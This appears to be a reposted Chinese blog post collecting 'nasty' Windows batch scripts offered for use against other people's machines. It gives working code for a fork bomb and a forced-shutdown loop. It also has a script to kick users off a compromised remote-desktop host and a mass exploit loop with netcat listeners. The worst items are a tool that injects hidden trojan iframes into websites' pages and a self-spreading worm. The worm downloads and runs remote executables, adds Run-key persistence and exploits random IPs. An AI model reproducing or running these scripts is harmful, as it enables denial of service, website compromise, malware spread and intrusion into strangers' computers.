几个恶心的批处理

 

鉴于大家最近都很关注批处理，特地从网上找来一点，大家有好的可以在后面跟！！
各种***批处理
第一个 : 让别人内存 OVER( 逼他重启 ) 
@echo off 
start cmd 
%0 

就这 3 行了  


第二个 : 让对方重启指定次数 ( 害人专用 ) 
@echo off 
if not exist c:\1.txt echo. >c:\1.txt & goto err1 
if not exist c:\2.txt echo. >c:\2.txt & goto err1 
if not exist c:\3.txt echo. >c:\3.txt & goto err1 
if not exist c:\4.txt echo. >c:\4.txt & goto err1 
if not exist c:\5.txt echo. >c:\5.txt & goto err1 
goto err2 
:err1 
shutdown -s -t 0 
:err2 
上面可以让对方电脑重启 5 次后不在重启  


第三个 : 自动踢人 (3389 肉机保护自己专用 ) 
@echo off 
logoff 1 
del log.bat 
logoff 后面的 1 改成自己登陆的 ID 号 , 用 query user 查看  


第四个 :  批量自动溢出  
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521 
先自己用 NC 监听端口 , 多开几个 , 然后指行 , 就自动溢出了  



第五个 : 自动挂马改主页  
@echo off 
cls 
rem  直接打批处理名字就有帮助  
title  批量挂马 , 改首页
color A 
set pan=%1 
set ye=%2 
set dai=%3 
if "%pan%"=="" goto e1 
if "%ye%"=="" goto e1 
if "%dai%"=="" goto e1 
if "%dai%"=="htm.txt" goto u1 
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://%dai%" width="0" height="0" frameborder="0"^> >>@path" 
echo. 
echo  代码全部插入完毕 !!!! 
echo. 
pause 
goto e1 
:u1 
echo  您现在的操作将使 %pan% 盘下 , 全部名为 %ye% 的内容变为您要更改的内容 . 
echo  这将是非常危险的 , 您真的要这样做 ?  回车却认 ,Ctrl+c 取消操作 . 
pause 
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y" 
echo. 
echo  首页全部更改完必 !!!! 如果您发现没有替换成功 , 请将 %ye% 文件只读属性去掉 . 
echo. 
pause 
:e1 
echo. 
echo  本批处理只适用于 2003 系统 , 其他系统要使用 , 请将 forfiles.exe 拷贝至系统盘 system32 目录下  
echo  用法 :snj ^< 搜索盘符 ^> ^< 文件名 ^> ^< 网马地址 ^> 
echo  例子 :snj d:\ index.asp [url]www.muma.com/mm.htm[/url] 
echo  批处理将自动添加 ^<iframe^> 标记  
echo. 
echo  如果您要更改全部网站的首页 ! 请在批处理文件所在目录下 , 新建一个名为 htm.txt 的文本文件 . 
echo  然后将要更改的代码加 COPY 到里面保存 . 然后将命令的 ^< 网马地址 ^> 项输入为 htm.txt 即可 . 
echo  例子 :snj d:\ index.asp htm.txt 
echo. 
echo  为了能准确无误执行批处理请最好先把记事本的 " 自动换行功能去掉 ", 让命令保持在一行才能正确执行 . 
echo. 
echo  使用此批处理造成一切后果本人概不负责 , 请大家谨慎使用 ! 
echo. 



第六个 : 利用批处理编写利用系统漏洞传播的蠕虫病毒  
del c:\42.exe 
del c:\nc.exe 
del c:\ip.exe 
echo dim wsh > %systemroot%\help\test.vbs 
echo set wsh=CreateObject("W..Shell") >> %systemroot%\help\test.vbs 
echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs 
echo dim wsh > %systemroot%\help\test2.vbs 
echo set wsh=CreateObject("W..Shell") >> %systemroot%\help\test2.vbs 
echo wsh.run "cmd /c start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs 
echo open 10.0.0.5 > %systemroot%\help\ftp.txt 
echo open myyes >> %systemroot%\help\ftp.txt 
echo 1 >> %systemroot%\help\ftp.txt 
echo binary >> %systemroot%\help\ftp.txt 
echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt 
echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt 
echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt 
echo bye >> %systemroot%\help\ftp.txt 
echo echo Set xPost = CreateObject("Microsoft.XMLHTTP") ^>1.vbs > %systemroot%\help\or.txt 
echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0 ^>^>1.vbs >> %systemroot%\help\or.txt 
echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt 
echo echo Set sGet = CreateObject("ADODB.Stream") ^>^>1.vbs >> %systemroot%\help\or.txt 
echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt 
echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt 
echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\help\or.txt 
echo echo sGet.SaveToFile "d:\my.exe",2 ^>^>1.vbs >> %systemroot%\help\or.txt 
echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt 
echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt 
echo Windows Registry Editor Version 5.00 > %systemroot%\help\1.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1.reg 
echo "SKYNET Personal FireWall"="F:\\ 系统安全工具 \\FireWall\\PFW.exe" >> %systemroot%\help\1.reg 
echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg 

if not exist %systemroot%\help\good.bat copy good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat 
regedit -s %systemroot%\help\1.reg 
ftp -s:%systemroot%\help\ftp.txt 
move c:\nc.exe %systemroot%\help\ /y 
move c:\42.exe %systemroot%\help\ /y 
move c:\ip.exe %systemroot%\help\ /y 
%systemroot%\help\test.vbs 
rem for /f %%i in (result1.txt) do set a=%%i 
rem for /f %%j in (result.txt) do 42 %a% %%j 810 
准备 : 
1: 找一个反向连接的溢出***程序 , 如 ms06040 漏洞  
2: 找呀一个免费 FTP 空间 , 最好是送域名的  
3: 利用你所知道的高级语言编写一个 , 能生成随机范围 IP 地址和找到本机 IP 的工具 . 
思路 : 
用 for 语句对指定文本里的 IP 进行溢出 , 然后用 if 语句判断是否溢出成功 ,  如果成功开启一个 NC 监听端口 ,NC 后面带一个  <  输入符号  
输入的内容为下载本批处理文件 , 然后执行这个批处理 . 这样被溢出的机器就又会在他那里运行我门的批处理 , 从而到自动传播的目的 . 

把批处理生成的文件集中放到一个目录下 , 可以 %systemroot% 系统变量直接放到系统目录下  
因为批处理运行后会闪出命令行窗口 , 我门可以利用 VBS 脚本来运行我们的批处理 , 这样就不会有任何窗口出现 , 脚本如下  
echo dim wsh > %systemroot%\help\test.vbs 
echo set wsh=CreateObject("W..Shell") >> %systemroot%\help\test.vbs 
echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs 

生成随机 IP 工具的 VB 代码  
Private Sub Form_Load() 
Dim fso As New FileSystemObject 
Dim a, b, c, d As Integer 
Dim ph, e As String 
ph = App.Path & "\" & "ip.txt" 
Randomize 
a = Int(253 * Rnd + 1) 
b = Int(253 * Rnd + 1) 
c = Int(240 * Rnd + 1) 
Open ph For Output As #1 
For i = c To c + 7 
For j = 1 To 254 
e = a & "." & b & "." & i & "." & j 
Print #1, e 
DoEvents 
Next j 
Next i 
Close #1 
Unload Me 
End Sub

 

转载于:https://blog.51cto.com/xiaolud/291391